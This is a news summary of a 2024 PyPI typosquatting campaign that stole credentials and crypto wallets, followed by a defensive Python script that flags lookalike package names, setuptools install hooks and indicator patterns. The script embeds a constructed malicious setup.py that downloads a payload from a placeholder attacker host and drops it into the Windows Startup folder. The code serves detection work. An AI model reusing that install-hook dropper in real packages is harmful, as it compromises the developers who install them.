PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers

March 29, 2024 at 02:09AM

The Python Package Index (PyPI) temporarily halted new user sign-ups due to an influx of malicious projects aimed at developers. Threat actors used typosquatting to upload deceptive versions of popular packages, targeting sensitive data and crypto wallets. Over 500 suspicious packages were uploaded within days, highlighting the increasing risk of supply chain attacks.

From the meeting notes dated Mar 29, 2024:
– The Python Package Index (PyPI) repository briefly suspended new user sign-ups in response to a malware upload campaign involving typosquatted versions of popular packages.
– The campaign aimed to steal cryptocurrency wallets, sensitive browser data, and various credentials, and employed a persistence mechanism to survive reboots.
– More than 100 malicious packages impersonated popular Python libraries such as PyTorch, Matplotlib, and Selenium, which are widely used in machine learning workflows, posing a threat to enterprise environments.
– Over 500 deceptive variants were uploaded starting March 26, 2024, each from a separate newly created account; this decentralized pattern of uploads complicates efforts to identify and attribute them.
– The attackers published variations of several popular packages which, at install time, checked whether the host was running Windows and, if so, fetched an obfuscated payload from an actor-controlled domain.
– The payload is an information stealer: it exfiltrates files, Discord tokens, browser data, and cryptocurrency wallets to a remote server, and attempts persistence by dropping a Python script into the Windows Startup folder.
– The incident highlights the growing risk of software supply chain attacks and the need for developers to evaluate third-party components for malicious behaviour before installing them.
– Notably, PyPI previously suspended new user registrations in May 2023 and December 2023 for similar reasons.
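The campaign's shape (a lookalike name, code that runs at install time, an OS check, a download from a remote host, a write to the Startup folder) lends itself to a pre-install triage check. The script below is an added example, not PyPI's or the researchers' tooling: it scores a package name against a short, assumed list of popular packages using Damerau-Levenshtein distance, parses the sdist's setup.py for setuptools install hooks, and greps it for the indicators described above. The two setup.py samples and the placeholder domain are constructed for illustration; the malicious sample is only parsed, never executed.

```python
"""Pre-install triage for a PyPI package: typosquat distance plus setup.py indicators.

Added example (not PyPI's or Checkmarx's tooling). The popular-package list, the
constructed setup.py samples and the placeholder domain are assumptions made here.
"""
import ast
import re

# Assumed: a short list standing in for the top-N PyPI package names a real
# check would load from the index.
POPULAR_PACKAGES = ["torch", "matplotlib", "selenium", "requests", "numpy"]

# Regex indicators for the behaviour the report describes: an OS check, a
# download from a remote host, a write to the Windows Startup folder, and
# decoding/executing code at runtime. Heuristic: benign packages can hit one
# of these; the combination with an install hook is what matters.
INDICATOR_PATTERNS = {
    "platform_check": r"platform\.system\(\)|sys\.platform|os\.name",
    "remote_fetch": r"urllib\.request|urlopen\(|requests\.(get|post)\(|http\.client",
    "startup_folder": r"Start Menu|Startup",
    "dynamic_exec": r"\bexec\(|\beval\(|base64\.b64decode\(|compile\(",
}


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment) distance: counts single
    insertions, deletions, substitutions and adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name, known=POPULAR_PACKAGES, max_distance=2):
    """Known package names within max_distance edits of `name` (exact match excluded).
    Names are normalised the way PyPI does: case-insensitive, '_' and '.' as '-'."""
    norm = re.sub(r"[-_.]+", "-", name).lower()
    return [k for k in known if k != norm and edit_distance(norm, k) <= max_distance]


def install_hooks(source: str):
    """Classes that subclass a setuptools command (install, develop, egg_info,
    build_py): the usual way to run code at `pip install` time from an sdist."""
    hooks = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if base_name in {"install", "develop", "egg_info", "build_py"}:
                    hooks.add(base_name)
    return sorted(hooks)


def scan_indicators(source: str):
    """Names of INDICATOR_PATTERNS that match somewhere in the setup.py source."""
    return [k for k, pat in INDICATOR_PATTERNS.items() if re.search(pat, source)]


def triage(name: str, source: str, known=POPULAR_PACKAGES):
    """Combine the three signals into a verdict: block / review / ok."""
    squat = typosquat_candidates(name, known)
    hooks = install_hooks(source)
    hits = scan_indicators(source)
    if squat and hooks and ("remote_fetch" in hits or "dynamic_exec" in hits):
        verdict = "block"  # lookalike name + install hook + fetch/exec: the campaign's shape
    elif squat or hooks or hits:
        verdict = "review"
    else:
        verdict = "ok"
    return {"name": name, "typosquat_of": squat, "install_hooks": hooks,
            "indicators": hits, "verdict": verdict}


# Constructed sample mirroring the behaviour described above; the domain is a
# placeholder and the script is inert (it is only parsed, never executed).
MALICIOUS_SETUP_PY = '''
import os, platform, base64, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        if platform.system() == "Windows":
            blob = urllib.request.urlopen("https://attacker.example.invalid/p.py").read()
            target = os.path.join(os.environ["APPDATA"], "Microsoft", "Windows",
                                  "Start Menu", "Programs", "Startup", "u.py")
            open(target, "wb").write(base64.b64decode(blob))

setup(name="matplotlb", version="3.8.0", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: a home-page URL in metadata is not a remote fetch.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="matplotlib", version="3.8.0", url="https://matplotlib.org")
'''

if __name__ == "__main__":
    print(triage("matplotlb", MALICIOUS_SETUP_PY))
    print(triage("matplotlib", BENIGN_SETUP_PY))
```

The name check alone is noisy (many legitimate packages sit within two edits of a popular one), and the regexes alone flag plenty of honest build scripts, so the verdict keys on the conjunction: a lookalike name plus a setuptools command override plus a fetch or decode step. Running it against the sdist before `pip install` (rather than against a wheel, which carries no setup.py) is the point, since the described campaign executed during installation.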
